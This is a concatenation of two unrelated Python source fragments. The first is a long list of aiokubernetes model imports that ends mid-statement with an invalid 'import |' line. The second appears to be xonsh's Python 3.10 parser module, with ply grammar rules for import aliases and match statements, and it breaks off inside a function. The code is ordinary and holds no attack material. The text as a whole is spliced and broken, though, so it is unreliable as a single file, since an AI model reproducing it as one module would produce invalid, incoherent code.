from aiokubernetes.models.extensions_v1beta1_se_linux_strategy_options import ExtensionsV1beta1SELinuxStrategyOptions
from aiokubernetes.models.extensions_v1beta1_scale import ExtensionsV1beta1Scale
from aiokubernetes.models.extensions_v1beta1_scale_spec import ExtensionsV1beta1ScaleSpec
from aiokubernetes.models.extensions_v1beta1_scale_status import ExtensionsV1beta1ScaleStatus
from aiokubernetes.models.extensions_v1beta1_supplemental_groups_strategy_options import ExtensionsV1beta1SupplementalGroupsStrategyOptions
from aiokubernetes.models.policy_v1beta1_allowed_flex_volume import PolicyV1beta1AllowedFlexVolume
from aiokubernetes.models.policy_v1beta1_allowed_host_path import PolicyV1beta1AllowedHostPath
from aiokubernetes.models.policy_v1beta1_fs_group_strategy_options import PolicyV1beta1FSGroupStrategyOptions
from aiokubernetes.models.policy_v1beta1_host_port_range import PolicyV1beta1HostPortRange
from aiokubernetes.models.policy_v1beta1_id_range import PolicyV1beta1IDRange
from aiokubernetes.models.policy_v1beta1_pod_security_policy import PolicyV1beta1PodSecurityPolicy
from aiokubernetes.models.policy_v1beta1_pod_security_policy_list import PolicyV1beta1PodSecurityPolicyList
from aiokubernetes.models.policy_v1beta1_pod_security_policy_spec import PolicyV1beta1PodSecurityPolicySpec
from aiokubernetes.models.policy_v1beta1_run_as_user_strategy_options import PolicyV1beta1RunAsUserStrategyOptions
from aiokubernetes.models.policy_v1beta1_se_linux_strategy_options import PolicyV1beta1SELinuxStrategyOptions
from aiokubernetes.models.policy_v1beta1_supplemental_groups_strategy_options import PolicyV1beta1SupplementalGroupsStrategyOptions
from aiokubernetes.models.runtime_raw_extension import RuntimeRawExtension
from aiokubernetes.models.v1_api_group import V1APIGroup
from aiokubernetes.models.v1_api_group_list import V1APIGroupList
from aiokubernetes.models.v1_api_resource import V1APIResource
from aiokubernetes.models.v1_api_resource_list import V1APIResourceList
from aiokubernetes.models.v1_api_service import V1APIService
from aiokubernetes.models.v1_api_service_condition import V1APIServiceCondition
from aiokubernetes.models.v1_api_service_list import V1APIServiceList
from aiokubernetes.models.v1_api_service_spec import V1APIServiceSpec
from aiokubernetes.models.v1_api_service_status import V1APIServiceStatus
from aiokubernetes.models.v1_api_versions import V1APIVersions
from aiokubernetes.models.v1_aws_elastic_block_store_volume_source import V1AWSElasticBlockStoreVolumeSource
from aiokubernetes.models.v1_affinity import V1Affinity
from aiokubernetes.models.v1_aggregation_rule import V1AggregationRule
from aiokubernetes.models.v1_attached_volume import V1AttachedVolume
from aiokubernetes.models.v1_azure_disk_volume_source import V1AzureDiskVolumeSource
from aiokubernetes.models.v1_azure_file_persistent_volume_source import V1AzureFilePersistentVolumeSource
from aiokubernetes.models.v1_azure_file_volume_source import V1AzureFileVolumeSource
from aiokubernetes.models.v1_binding import V1Binding
from aiokubernetes.models.v1_csi_persistent_volume_source import V1CSIPersistentVolumeSource
from aiokubernetes.models.v1_capabilities import V1Capabilities
from aiokubernetes.models.v1_ceph_fs_persistent_volume_source import V1CephFSPersistentVolumeSource
from aiokubernetes.models.v1_ceph_fs_volume_source import V1CephFSVolumeSource
from aiokubernetes.models.v1_cinder_volume_source import V1CinderVolumeSource
from aiokubernetes.models.v1_client_ip_config import V1ClientIPConfig
from aiokubernetes.models.v1_cluster_role import V1ClusterRole
from aiokubernetes.models.v1_cluster_role_binding import V1ClusterRoleBinding
from aiokubernetes.models.v1_cluster_role_binding_list import V1ClusterRoleBindingList
from aiokubernetes.models.v1_cluster_role_list import V1ClusterRoleList
from aiokubernetes.models.v1_component_condition import V1ComponentCondition
from aiokubernetes.models.v1_component_status import V1ComponentStatus
from aiokubernetes.models.v1_component_status_list import V1ComponentStatusList
from aiokubernetes.models.v1_config_map import V1ConfigMap
from aiokubernetes.models.v1_config_map_env_source import V1ConfigMapEnvSource
from aiokubernetes.models.v1_config_map_key_selector import V1ConfigMapKeySelector
from aiokubernetes.models.v1_config_map_list import V1ConfigMapList
from aiokubernetes.models.v1_config_map_projection import V1ConfigMapProjection
from aiokubernetes.models.v1_config_map_volume_source import V1ConfigMapVolumeSource
from aiokubernetes.models.v1_container import V1Container
from aiokubernetes.models.v1_container_image import V1ContainerImage
from aiokubernetes.models.v1_container_port import V1ContainerPort
from aiokubernetes.models.v1_container_state import V1ContainerState
from aiokubernetes.models.v1_container_state_running import V1ContainerStateRunning
from aiokubernetes.models.v1_container_state_terminated import V1ContainerStateTerminated
from aiokubernetes.models.v1_container_state_waiting import V1ContainerStateWaiting
from aiokubernetes.models.v1_container_status import V1ContainerStatus
from aiokubernetes.models.v1_controller_revision import V1ControllerRevision
from aiokubernetes.models.v1_controller_revision_list import V1ControllerRevisionList
from aiokubernetes.models.v1_cross_version_object_reference import V1CrossVersionObjectReference
from aiokubernetes.models.v1_daemon_endpoint import V1DaemonEndpoint
from aiokubernetes.models.v1_daemon_set import V1DaemonSet
from aiokubernetes.models.v1_daemon_set_condition import V1DaemonSetCondition
from aiokubernetes.models.v1_daemon_set_list import V1DaemonSetList
from aiokubernetes.models.v1_daemon_set_spec import V1DaemonSetSpec
from aiokubernetes.models.v1_daemon_set_status import V1DaemonSetStatus
from aiokubernetes.models.v1_daemon_set_update_strategy import V1DaemonSetUpdateStrategy
from aiokubernetes.models.v1_delete_options import V1DeleteOptions
from aiokubernetes.models.v1_deployment import V1Deployment
from aiokubernetes.models.v1_deployment_condition import V1DeploymentCondition
from aiokubernetes.models.v1_deployment_list import V1DeploymentList
from aiokubernetes.models.v1_deployment_spec import V1DeploymentSpec
from aiokubernetes.models.v1_deployment_status import V1DeploymentStatus
from aiokubernetes.models.v1_deployment_strategy import V1DeploymentStrategy
from aiokubernetes.models.v1_downward_api_projection import V1DownwardAPIProjection
from aiokubernetes.models.v1_downward_api_volume_file import V1DownwardAPIVolumeFile
from aiokubernetes.models.v1_downward_api_volume_source import V1DownwardAPIVolumeSource
from aiokubernetes.models.v1_empty_dir_volume_source import V1EmptyDirVolumeSource
from aiokubernetes.models.v1_endpoint_address import V1EndpointAddress
from aiokubernetes.models.v1_endpoint_port import V1EndpointPort
from aiokubernetes.models.v1_endpoint_subset import V1EndpointSubset
from aiokubernetes.models.v1_endpoints import V1Endpoints
from aiokubernetes.models.v1_endpoints_list import V1EndpointsList
from aiokubernetes.models.v1_env_from_source import V1EnvFromSource
from aiokubernetes.models.v1_env_var import V1EnvVar
from aiokubernetes.models.v1_env_var_source import V1EnvVarSource
from aiokubernetes.models.v1_event import V1Event
from aiokubernetes.models.v1_event_list import V1EventList
from aiokubernetes.models.v1_event_series import V1EventSeries
from aiokubernetes.models.v1_event_source import V1EventSource
from aiokubernetes.models.v1_exec_action import V1ExecAction
from aiokubernetes.models.v1_fc_volume_source import V1FCVolumeSource
from aiokubernetes.models.v1_flex_persistent_volume_source import V1FlexPersistentVolumeSource
from aiokubernetes.models.v1_flex_volume_source import V1FlexVolumeSource
from aiokubernetes.models.v1_flocker_volume_source import V1FlockerVolumeSource
from aiokubernetes.models.v1_gce_persistent_disk_volume_source import V1GCEPersistentDiskVolumeSource
from aiokubernetes.models.v1_git_repo_volume_source import V1GitRepoVolumeSource
from aiokubernetes.models.v1_glusterfs_volume_source import V1GlusterfsVolumeSource
from aiokubernetes.models.v1_group_version_for_discovery import V1GroupVersionForDiscovery
from aiokubernetes.models.v1_http_get_action import V1HTTPGetAction
from aiokubernetes.models.v1_http_header import V1HTTPHeader
from aiokubernetes.models.v1_handler import V1Handler
from aiokubernetes.models.v1_horizontal_pod_autoscaler import V1HorizontalPodAutoscaler
from aiokubernetes.models.v1_horizontal_pod_autoscaler_list import V1HorizontalPodAutoscalerList
from aiokubernetes.models.v1_horizontal_pod_autoscaler_spec import V1HorizontalPodAutoscalerSpec
from aiokubernetes.models.v1_horizontal_pod_autoscaler_status import V1HorizontalPodAutoscalerStatus
from aiokubernetes.models.v1_host_alias import V1HostAlias
from aiokubernetes.models.v1_host_path_volume_source import V1HostPathVolumeSource
from aiokubernetes.models.v1_ip_block import V1IPBlock
from aiokubernetes.models.v1_iscsi_persistent_volume_source import V1ISCSIPersistentVolumeSource
from aiokubernetes.models.v1_iscsi_volume_source import V1ISCSIVolumeSource
from aiokubernetes.models.v1_initializer import V1Initializer
from aiokubernetes.models.v1_initializers import V1Initializers
from aiokubernetes.models.v1_job import V1Job
from aiokubernetes.models.v1_job_condition import V1JobCondition
from aiokubernetes.models.v1_job_list import V1JobList
from aiokubernetes.models.v1_job_spec import V1JobSpec
from aiokubernetes.models.v1_job_status import V1JobStatus
from aiokubernetes.models.v1_key_to_path import V1KeyToPath
from aiokubernetes.models.v1_label_selector import V1LabelSelector
from aiokubernetes.models.v1_label_selector_requirement import V1LabelSelectorRequirement
from aiokubernetes.models.v1_lifecycle import V1Lifecycle
from aiokubernetes.models.v1_limit_range import V1LimitRange
from aiokubernetes.models.v1_limit_range_item import V1LimitRangeItem
from aiokubernetes.models.v1_limit_range_list import V1LimitRangeList
from aiokubernetes.models.v1_limit_range_spec import V1LimitRangeSpec
from aiokubernetes.models.v1_list_meta import V1ListMeta
from aiokubernetes.models.v1_load_balancer_ingress import V1LoadBalancerIngress
from aiokubernetes.models.v1_load_balancer_status import V1LoadBalancerStatus
from aiokubernetes.models.v1_local_object_reference import V1LocalObjectReference
from aiokubernetes.models.v1_local_subject_access_review import V1LocalSubjectAccessReview
from aiokubernetes.models.v1_local_volume_source import V1LocalVolumeSource
from aiokubernetes.models.v1_nfs_volume_source import V1NFSVolumeSource
from aiokubernetes.models.v1_namespace import V1Namespace
from aiokubernetes.models.v1_namespace_list import V1NamespaceList
from aiokubernetes.models.v1_namespace_spec import V1NamespaceSpec
from aiokubernetes.models.v1_namespace_status import V1NamespaceStatus
from aiokubernetes.models.v1_network_policy import V1NetworkPolicy
from aiokubernetes.models.v1_network_policy_egress_rule import V1NetworkPolicyEgressRule
from aiokubernetes.models.v1_network_policy_ingress_rule import V1NetworkPolicyIngressRule
from aiokubernetes.models.v1_network_policy_list import V1NetworkPolicyList
from aiokubernetes.models.v1_network_policy_peer import V1NetworkPolicyPeer
from aiokubernetes.models.v1_network_policy_port import V1NetworkPolicyPort
from aiokubernetes.models.v1_network_policy_spec import V1NetworkPolicySpec
from aiokubernetes.models.v1_node import V1Node
from aiokubernetes.models.v1_node_address import V1NodeAddress
from aiokubernetes.models.v1_node_affinity import V1NodeAffinity
from aiokubernetes.models.v1_node_condition import V1NodeCondition
from aiokubernetes.models.v1_node_config_source import V1NodeConfigSource
from aiokubernetes.models.v1_node_daemon_endpoints import V1NodeDaemonEndpoints
from aiokubernetes.models.v1_node_list import V1NodeList
from aiokubernetes.models.v1_node_selector import V1NodeSelector
from aiokubernetes.models.v1_node_selector_requirement import V1NodeSelectorRequirement
from aiokubernetes.models.v1_node_selector_term import V1NodeSelectorTerm
from aiokubernetes.models.v1_node_spec import V1NodeSpec
from aiokubernetes.models.v1_node_status import V1NodeStatus
from aiokubernetes.models.v1_node_system_info import V1NodeSystemInfo
from aiokubernetes.models.v1_non_resource_attributes import V1NonResourceAttributes
from aiokubernetes.models.v1_non_resource_rule import V1NonResourceRule
from aiokubernetes.models.v1_object_field_selector import V1ObjectFieldSelector
from aiokubernetes.models.v1_object_meta import V1ObjectMeta
from aiokubernetes.models.v1_object_reference import V1ObjectReference
from aiokubernetes.models.v1_owner_reference import V1OwnerReference
from aiokubernetes.models.v1_persistent_volume import V1PersistentVolume
from aiokubernetes.models.v1_persistent_volume_claim import V1PersistentVolumeClaim
from aiokubernetes.models.v1_persistent_volume_claim_condition import V1PersistentVolumeClaimCondition
from aiokubernetes.models.v1_persistent_volume_claim_list import V1PersistentVolumeClaimList
from aiokubernetes.models.v1_persistent_volume_claim_spec import V1PersistentVolumeClaimSpec
from aiokubernetes.models.v1_persistent_volume_claim_status import V1PersistentVolumeClaimStatus
from aiokubernetes.models.v1_persistent_volume_claim_volume_source import V1PersistentVolumeClaimVolumeSource
from aiokubernetes.models.v1_persistent_volume_list import V1PersistentVolumeList
from aiokubernetes.models.v1_persistent_volume_spec import V1PersistentVolumeSpec
from aiokubernetes.models.v1_persistent_volume_status import V1PersistentVolumeStatus
from aiokubernetes.models.v1_photon_persistent_disk_volume_source import V1PhotonPersistentDiskVolumeSource
from aiokubernetes.models.v1_pod import V1Pod
from aiokubernetes.models.v1_pod_affinity import V1PodAffinity
from aiokubernetes.models.v1_pod_affinity_term import V1PodAffinityTerm
from aiokubernetes.models.v1_pod_anti_affinity import V1PodAntiAffinity
from aiokubernetes.models.v1_pod_condition import V1PodCondition
from aiokubernetes.models.v1_pod_dns_config import V1PodDNSConfig
from aiokubernetes.models.v1_pod_dns_config_option import V1PodDNSConfigOption
from aiokubernetes.models.v1_pod_list import V1PodList
from aiokubernetes.models.v1_pod_security_context import V1PodSecurityContext
from aiokubernetes.models.v1_pod_spec import V1PodSpec
from aiokubernetes.models.v1_pod_status import V1PodStatus
from aiokubernetes.models.v1_pod_template import V1PodTemplate
from aiokubernetes.models.v1_pod_template_list import V1PodTemplateList
from aiokubernetes.models.v1_pod_template_spec import V1PodTemplateSpec
from aiokubernetes.models.v1_policy_rule import V1PolicyRule
from aiokubernetes.models.v1_portworx_volume_source import V1PortworxVolumeSource
from aiokubernetes.models.v1_preconditions import V1Preconditions
from aiokubernetes.models.v1_preferred_scheduling_term import V1PreferredSchedulingTerm
from aiokubernetes.models.v1_probe import V1Probe
from aiokubernetes.models.v1_projected_volume_source import V1ProjectedVolumeSource
from aiokubernetes.models.v1_quobyte_volume_source import V1QuobyteVolumeSource
from aiokubernetes.models.v1_rbd_persistent_volume_source import V1RBDPersistentVolumeSource
from aiokubernetes.models.v1_rbd_volume_source import V1RBDVolumeSource
from aiokubernetes.models.v1_replica_set import V1ReplicaSet
from aiokubernetes.models.v1_replica_set_condition import V1ReplicaSetCondition
from aiokubernetes.models.v1_replica_set_list import V1ReplicaSetList
from aiokubernetes.models.v1_replica_set_spec import V1ReplicaSetSpec
from aiokubernetes.models.v1_replica_set_status import V1ReplicaSetStatus
from aiokubernetes.models.v1_replication_controller import V1ReplicationController
from aiokubernetes.models.v1_replication_controller_condition import V1ReplicationControllerCondition
from aiokubernetes.models.v1_replication_controller_list import V1ReplicationControllerList
from aiokubernetes.models.v1_replication_controller_spec import V1ReplicationControllerSpec
from aiokubernetes.models.v1_replication_controller_status import V1ReplicationControllerStatus
from aiokubernetes.models.v1_resource_attributes import V1ResourceAttributes
from aiokubernetes.models.v1_resource_field_selector import V1ResourceFieldSelector
from aiokubernetes.models.v1_resource_quota import V1ResourceQuota
from aiokubernetes.models.v1_resource_quota_list import V1ResourceQuotaList
from aiokubernetes.models.v1_resource_quota_spec import V1ResourceQuotaSpec
from aiokubernetes.models.v1_resource_quota_status import V1ResourceQuotaStatus
from aiokubernetes.models.v1_resource_requirements import V1ResourceRequirements
from aiokubernetes.models.v1_resource_rule import V1ResourceRule
from aiokubernetes.models.v1_role import V1Role
from aiokubernetes.models.v1_role_binding import V1RoleBinding
from aiokubernetes.models.v1_role_binding_list import V1RoleBindingList
from aiokubernetes.models.v1_role_list import V1RoleList
from aiokubernetes.models.v1_role_ref import V1RoleRef
from aiokubernetes.models.v1_rolling_update_daemon_set import V1RollingUpdateDaemonSet
from aiokubernetes.models.v1_rolling_update_deployment import V1RollingUpdateDeployment
from aiokubernetes.models.v1_rolling_update_stateful_set_strategy import V1RollingUpdateStatefulSetStrategy
from aiokubernetes.models.v1_se_linux_options import V1SELinuxOptions
from aiokubernetes.models.v1_scale import V1Scale
from aiokubernetes.models.v1_scale_io_persistent_volume_source import V1ScaleIOPersistentVolumeSource
from aiokubernetes.models.v1_scale_io_volume_source import V1ScaleIOVolumeSource
from aiokubernetes.models.v1_scale_spec import V1ScaleSpec
from aiokubernetes.models.v1_scale_status import V1ScaleStatus
from aiokubernetes.models.v1_secret import V1Secret
from aiokubernetes.models.v1_secret_env_source import V1SecretEnvSource
from aiokubernetes.models.v1_secret_key_selector import V1SecretKeySelector
from aiokubernetes.models.v1_secret_list import V1SecretList
from aiokubernetes.models.v1_secret_projection import V1SecretProjection
from aiokubernetes.models.v1_secret_reference import V1SecretReference
from aiokubernetes.models.v1_secret_volume_source import V1SecretVolumeSource
from aiokubernetes.models.v1_security_context import V1SecurityContext
from aiokubernetes.models.v1_self_subject_access_review import V1SelfSubjectAccessReview
from aiokubernetes.models.v1_self_subject_access_review_spec import V1SelfSubjectAccessReviewSpec
from aiokubernetes.models.v1_self_subject_rules_review import V1SelfSubjectRulesReview
from aiokubernetes.models.v1_self_subject_rules_review_spec import V1SelfSubjectRulesReviewSpec
from aiokubernetes.models.v1_server_address_by_client_cidr import V1ServerAddressByClientCIDR
from aiokubernetes.models.v1_service import V1Service
from aiokubernetes.models.v1_service_account import V1ServiceAccount
from aiokubernetes.models.v1_service_account_list import V1ServiceAccountList
from aiokubernetes.models.v1_service_list import V1ServiceList
from aiokubernetes.models.v1_service_port import V1ServicePort
from aiokubernetes.models.v1_service_reference import V1ServiceReference
from aiokubernetes.models.v1_service_spec import V1ServiceSpec
from aiokubernetes.models.v1_service_status import V1ServiceStatus
from aiokubernetes.models.v1_session_affinity_config import V1SessionAffinityConfig
from aiokubernetes.models.v1_stateful_set import V1StatefulSet
from aiokubernetes.models.v1_stateful_set_condition import V1StatefulSetCondition
from aiokubernetes.models.v1_stateful_set_list import V1StatefulSetList
from aiokubernetes.models.v1_stateful_set_spec import V1StatefulSetSpec
from aiokubernetes.models.v1_stateful_set_status import V1StatefulSetStatus
from aiokubernetes.models.v1_stateful_set_update_strategy import V1StatefulSetUpdateStrategy
from aiokubernetes.models.v1_status import V1Status
from aiokubernetes.models.v1_status_cause import V1StatusCause
from aiokubernetes.models.v1_status_details import V1StatusDetails
from aiokubernetes.models.v1_storage_class import V1StorageClass
from aiokubernetes.models.v1_storage_class_list import V1StorageClassList
from aiokubernetes.models.v1_storage_os_persistent_volume_source import V1StorageOSPersistentVolumeSource
from aiokubernetes.models.v1_storage_os_volume_source import V1StorageOSVolumeSource
from aiokubernetes.models.v1_subject import V1Subject
from aiokubernetes.models.v1_subject_access_review import V1SubjectAccessReview
from aiokubernetes.models.v1_subject_access_review_spec import V1SubjectAccessReviewSpec
from aiokubernetes.models.v1_subject_access_review_status import V1SubjectAccessReviewStatus
from aiokubernetes.models.v1_subject_rules_review_status import V1SubjectRulesReviewStatus
from aiokubernetes.models.v1_tcp_socket_action import V1TCPSocketAction
from aiokubernetes.models.v1_taint import V1Taint
from aiokubernetes.models.v1_token_review import V1TokenReview
from aiokubernetes.models.v1_token_review_spec import V1TokenReviewSpec
from aiokubernetes.models.v1_token_review_status import V1TokenReviewStatus
from aiokubernetes.models.v1_toleration import V1Toleration
from aiokubernetes.models.v1_user_info import V1UserInfo
from aiokubernetes.models.v1_volume import V1Volume
from aiokubernetes.models.v1_volume_device import V1VolumeDevice
from aiokubernetes.models.v1_volume_mount import V1VolumeMount
from aiokubernetes.models.v1_volume_node_affinity import V1VolumeNodeAffinity
from aiokubernetes.models.v1_volume_projection import V1VolumeProjection
from aiokubernetes.models.v1_vsphere_virtual_disk_volume_source import V1VsphereVirtualDiskVolumeSource
from aiokubernetes.models.v1_watch_event import V1WatchEvent
from aiokubernetes.models.v1_weighted_pod_affinity_term import V1WeightedPodAffinityTerm
from aiokubernetes.models.v1alpha1_aggregation_rule import V1alpha1AggregationRule
from aiokubernetes.models.v1alpha1_cluster_role import V1alpha1ClusterRole
from aiokubernetes.models.v1alpha1_cluster_role_binding import V1alpha1ClusterRoleBinding
from aiokubernetes.models.v1alpha1_cluster_role_binding_list import V1alpha1ClusterRoleBindingList
from aiokubernetes.models.v1alpha1_cluster_role_list import V1alpha1ClusterRoleList
from aiokubernetes.models.v1alpha1_initializer import V1alpha1Initializer
from aiokubernetes.models.v1alpha1_initializer_configuration import V1alpha1InitializerConfiguration
from aiokubernetes.models.v1alpha1_initializer_configuration_list import V1alpha1InitializerConfigurationList
from aiokubernetes.models.v1alpha1_pod_preset import V1alpha1PodPreset
from aiokubernetes.models.v1alpha1_pod_preset_list import V1alpha1PodPresetList
from aiokubernetes.models.v1alpha1_pod_preset_spec import V1alpha1PodPresetSpec
from aiokubernetes.models.v1alpha1_policy_rule import V1alpha1PolicyRule
from aiokubernetes.models.v1alpha1_priority_class import V1alpha1PriorityClass
from aiokubernetes.models.v1alpha1_priority_class_list import V1alpha1PriorityClassList
from aiokubernetes.models.v1alpha1_role import V1alpha1Role
from aiokubernetes.models.v1alpha1_role_binding import V1alpha1RoleBinding
from aiokubernetes.models.v1alpha1_role_binding_list import V1alpha1RoleBindingList
from aiokubernetes.models.v1alpha1_role_list import V1alpha1RoleList
from aiokubernetes.models.v1alpha1_role_ref import V1alpha1RoleRef
from aiokubernetes.models.v1alpha1_rule import V1alpha1Rule
from aiokubernetes.models.v1alpha1_subject import V1alpha1Subject
from aiokubernetes.models.v1alpha1_volume_attachment import V1alpha1VolumeAttachment
from aiokubernetes.models.v1alpha1_volume_attachment_list import V1alpha1VolumeAttachmentList
from aiokubernetes.models.v1alpha1_volume_attachment_source import V1alpha1VolumeAttachmentSource
from aiokubernetes.models.v1alpha1_volume_attachment_spec import V1alpha1VolumeAttachmentSpec
from aiokubernetes.models.v1alpha1_volume_attachment_status import V1alpha1VolumeAttachmentStatus
from aiokubernetes.models.v1alpha1_volume_error import V1alpha1VolumeError
from aiokubernetes.models.v1beta1_api_service import V1beta1APIService
from aiokubernetes.models.v1beta1_api_service_condition import V1beta1APIServiceCondition
from aiokubernetes.models.v1beta1_api_service_list import V1beta1APIServiceList
from aiokubernetes.models.v1beta1_api_service_spec import V1beta1APIServiceSpec
from aiokubernetes.models.v1beta1_api_service_status import V1beta1APIServiceStatus
from aiokubernetes.models.v1beta1_aggregation_rule import V1beta1AggregationRule
from aiokubernetes.models.v1beta1_certificate_signing_request import V1beta1CertificateSigningRequest
from aiokubernetes.models.v1beta1_certificate_signing_request_condition import V1beta1CertificateSigningRequestCondition
from aiokubernetes.models.v1beta1_certificate_signing_request_list import V1beta1CertificateSigningRequestList
from aiokubernetes.models.v1beta1_certificate_signing_request_spec import V1beta1CertificateSigningRequestSpec
from aiokubernetes.models.v1beta1_certificate_signing_request_status import V1beta1CertificateSigningRequestStatus
from aiokubernetes.models.v1beta1_cluster_role import V1beta1ClusterRole
from aiokubernetes.models.v1beta1_cluster_role_binding import V1beta1ClusterRoleBinding
from aiokubernetes.models.v1beta1_cluster_role_binding_list import V1beta1ClusterRoleBindingList
from aiokubernetes.models.v1beta1_cluster_role_list import V1beta1ClusterRoleList
from aiokubernetes.models.v1beta1_controller_revision import V1beta1ControllerRevision
from aiokubernetes.models.v1beta1_controller_revision_list import V1beta1ControllerRevisionList
from aiokubernetes.models.v1beta1_cron_job import V1beta1CronJob
from aiokubernetes.models.v1beta1_cron_job_list import V1beta1CronJobList
from aiokubernetes.models.v1beta1_cron_job_spec import V1beta1CronJobSpec
from aiokubernetes.models.v1beta1_cron_job_status import V1beta1CronJobStatus
from aiokubernetes.models.v1beta1_custom_resource_definition import V1beta1CustomResourceDefinition
from aiokubernetes.models.v1beta1_custom_resource_definition_condition import V1beta1CustomResourceDefinitionCondition
from aiokubernetes.models.v1beta1_custom_resource_definition_list import V1beta1CustomResourceDefinitionList
from aiokubernetes.models.v1beta1_custom_resource_definition_names import V1beta1CustomResourceDefinitionNames
from aiokubernetes.models.v1beta1_custom_resource_definition_spec import V1beta1CustomResourceDefinitionSpec
from aiokubernetes.models.v1beta1_custom_resource_definition_status import V1beta1CustomResourceDefinitionStatus
from aiokubernetes.models.v1beta1_custom_resource_subresource_scale import V1beta1CustomResourceSubresourceScale
from aiokubernetes.models.v1beta1_custom_resource_subresources import V1beta1CustomResourceSubresources
from aiokubernetes.models.v1beta1_custom_resource_validation import V1beta1CustomResourceValidation
from aiokubernetes.models.v1beta1_daemon_set import V1beta1DaemonSet
from aiokubernetes.models.v1beta1_daemon_set_condition import V1beta1DaemonSetCondition
from aiokubernetes.models.v1beta1_daemon_set_list import V1beta1DaemonSetList
from aiokubernetes.models.v1beta1_daemon_set_spec import V1beta1DaemonSetSpec
from aiokubernetes.models.v1beta1_daemon_set_status import V1beta1DaemonSetStatus
from aiokubernetes.models.v1beta1_daemon_set_update_strategy import V1beta1DaemonSetUpdateStrategy
from aiokubernetes.models.v1beta1_event import V1beta1Event
from aiokubernetes.models.v1beta1_event_list import V1beta1EventList
from aiokubernetes.models.v1beta1_event_series import V1beta1EventSeries
from aiokubernetes.models.v1beta1_eviction import V1beta1Eviction
from aiokubernetes.models.v1beta1_external_documentation import V1beta1ExternalDocumentation
from aiokubernetes.models.v1beta1_http_ingress_path import V1beta1HTTPIngressPath
from aiokubernetes.models.v1beta1_http_ingress_rule_value import V1beta1HTTPIngressRuleValue
from aiokubernetes.models.v1beta1_ip_block import V1beta1IPBlock
from aiokubernetes.models.v1beta1_ingress import V1beta1Ingress
from aiokubernetes.models.v1beta1_ingress_backend import V1beta1IngressBackend
from aiokubernetes.models.v1beta1_ingress_list import V1beta1IngressList
from aiokubernetes.models.v1beta1_ingress_rule import V1beta1IngressRule
from aiokubernetes.models.v1beta1_ingress_spec import V1beta1IngressSpec
from aiokubernetes.models.v1beta1_ingress_status import V1beta1IngressStatus
from aiokubernetes.models.v1beta1_ingress_tls import V1beta1IngressTLS
from aiokubernetes.models.v1beta1_json import V1beta1JSON
from aiokubernetes.models.v1beta1_json_schema_props import V1beta1JSONSchemaProps
from aiokubernetes.models.v1beta1_json_schema_props_or_array import V1beta1JSONSchemaPropsOrArray
from aiokubernetes.models.v1beta1_json_schema_props_or_bool import V1beta1JSONSchemaPropsOrBool
from aiokubernetes.models.v1beta1_json_schema_props_or_string_array import V1beta1JSONSchemaPropsOrStringArray
from aiokubernetes.models.v1beta1_job_template_spec import V1beta1JobTemplateSpec
from aiokubernetes.models.v1beta1_local_subject_access_review import V1beta1LocalSubjectAccessReview
from aiokubernetes.models.v1beta1_mutating_webhook_configuration import V1beta1MutatingWebhookConfiguration
from aiokubernetes.models.v1beta1_mutating_webhook_configuration_list import V1beta1MutatingWebhookConfigurationList
from aiokubernetes.models.v1beta1_network_policy import V1beta1NetworkPolicy
from aiokubernetes.models.v1beta1_network_policy_egress_rule import V1beta1NetworkPolicyEgressRule
from aiokubernetes.models.v1beta1_network_policy_ingress_rule import V1beta1NetworkPolicyIngressRule
from aiokubernetes.models.v1beta1_network_policy_list import V1beta1NetworkPolicyList
from aiokubernetes.models.v1beta1_network_policy_peer import V1beta1NetworkPolicyPeer
from aiokubernetes.models.v1beta1_network_policy_port import V1beta1NetworkPolicyPort
from aiokubernetes.models.v1beta1_network_policy_spec import V1beta1NetworkPolicySpec
from aiokubernetes.models.v1beta1_non_resource_attributes import V1beta1NonResourceAttributes
from aiokubernetes.models.v1beta1_non_resource_rule import | |
# type: ignore
# TODO: remove line above once mypy understands the match statement
"""Handles changes since PY310
handle
- import-alias requiring lineno
- match statement
"""
import ast
from xonsh.parsers.v39 import Parser as ThreeNineParser
from xonsh.ply.ply import yacc
class Parser(ThreeNineParser):
def p_import_from_post_times(self, p):
"""import_from_post : TIMES"""
p[0] = [ast.alias(name=p[1], asname=None, **self.get_line_cols(p, 1))]
def p_import_as_name(self, p):
"""import_as_name : name_str as_name_opt"""
self.p_dotted_as_name(p)
def p_dotted_as_name(self, p: yacc.YaccProduction):
"""dotted_as_name : dotted_name as_name_opt"""
alias_idx = 2
p[0] = ast.alias(
name=p[1], asname=p[alias_idx], **self.get_line_cols(p, alias_idx)
)
@staticmethod
def get_line_cols(p: yacc.YaccProduction, idx: int):
line_no, end_line_no = p.linespan(idx)
col_offset, end_col_offset = p.lexspan(idx)
return dict(
lineno=line_no,
end_lineno=end_line_no,
col_offset=col_offset,
end_col_offset=end_col_offset,
)
def _set_error_at_production_index(self, msg, p, i):
error_loc = self.get_line_cols(p, i)
err_lineno = error_loc["lineno"]
err_column = error_loc["col_offset"] + 1
self._set_error(msg, self.currloc(lineno=err_lineno, column=err_column))
def p_compound_stmt_match(self, p):
"""
compound_stmt : match_stmt
"""
p[0] = p[1]
def p_match_stmt(self, p):
"""
match_stmt : match_tok subject_expr COLON NEWLINE INDENT case_block_list_nonempty DEDENT
"""
_, _, subject_expr, _, _, _, case_block_list_nonempty, _ = p
p[0] = [
ast.Match(
**self.get_line_cols(p, 1),
subject=subject_expr,
cases=case_block_list_nonempty,
)
]
# case blocks
def p_case_block(self, p):
"""
case_block : case_tok patterns COLON suite
| case_tok patterns IF test COLON suite
"""
loc = self.get_line_cols(p, 1)
match list(p):
case [_, _, pattern, _, suite]:
p[0] = ast.match_case(pattern=pattern, body=suite, **loc)
case [_, _, pattern, _, guard, _, suite]:
p[0] = ast.match_case(pattern=pattern, body=suite, guard=guard, **loc)
case _:
raise AssertionError()
def p_case_block_list_nonempty(self, p):
"""
case_block_list_nonempty : case_block
| case_block case_block_list_nonempty
"""
match list(p):
case [_, case_block]:
p[0] = [case_block]
case [_, case_block, case_block_list_nonempty]:
p[0] = [case_block] + case_block_list_nonempty
case _:
raise AssertionError()
# subject expression
def p_subject_expr_single_value(self, p):
"""
subject_expr : test_or_star_expr comma_opt
"""
match list(p):
case [_, test_or_star_expr, None]:
# single value
p[0] = test_or_star_expr
case [_, test_or_star_expr, ","]:
# tuple with one element
p[0] = ast.Tuple(
elts=[test_or_star_expr], ctx=ast.Load(), **self.get_line_cols(p, 1)
)
case _:
raise AssertionError()
def p_subject_expr_multiple_values(self, p):
"""
subject_expr : test_or_star_expr comma_test_or_star_expr_list comma_opt
"""
match list(p):
case [_, test_or_star_expr, comma_test_or_star_expr_list, "," | None]:
# tuple with more than one element
p[0] = ast.Tuple(
elts=[test_or_star_expr] + comma_test_or_star_expr_list,
